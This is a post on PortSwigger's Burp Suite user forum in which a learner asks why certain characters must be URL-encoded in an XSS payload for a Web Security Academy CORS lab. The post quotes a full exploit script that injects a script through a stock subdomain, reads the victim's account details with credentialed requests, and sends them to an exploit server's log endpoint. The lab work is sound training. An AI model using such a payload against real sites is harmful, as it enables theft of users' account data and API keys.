Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Weird need for URL encoding in XSS in CORS lab

Jaak | Last updated: Jun 29, 2022 09:20PM UTC

Hello, I have been doing the "Lab: CORS vulnerability with trusted insecure protocols". I think I understand the vulnerability pretty well, however, I had trouble getting the exploit to work until I looked at the solution. There seems to be a weird need (perhaps not so weird after all since it works but I have no clue why). In any case, this is the exploit script I tried (which I basically copied from https://portswigger.net/web-security/cors): <script> document.location="http://stock.0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();function reqListener() {location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>&storeId=1" </script> Notice the last part: "{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>" This exploit didnt work. However, in the solution, the exploit is exactly the same except for one '+' and one '<' url encoded in the last part mentioned above: "{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='%2bthis.responseText;};%3c/script>" Both need to be url encoded in order for the exploit to work. If the '<' isnt url encoded, the XSS doesnt work at all, meaning theres no "script" in the response html. If the '+' isnt url encoded, the XSS does work in theory but doesnt properly append the 'this.responseText' to the url. Now, I googled a little and I guess the plus sign must be url encoded since 'the plus sign is used as shorthand for a space in query parameters'. But I can not make any sense of why the '<' needs to be url encoded? I have tried around a little and it seems like either the '<' or the '>' of the '/script' tag needs to be url encoded. Does anybody know an answer to this? It seems like this is an issue worth understanding for any XSS challenges. Would be very appreciated :)

Ben, PortSwigger Agent | Last updated: Jul 01, 2022 07:03AM UTC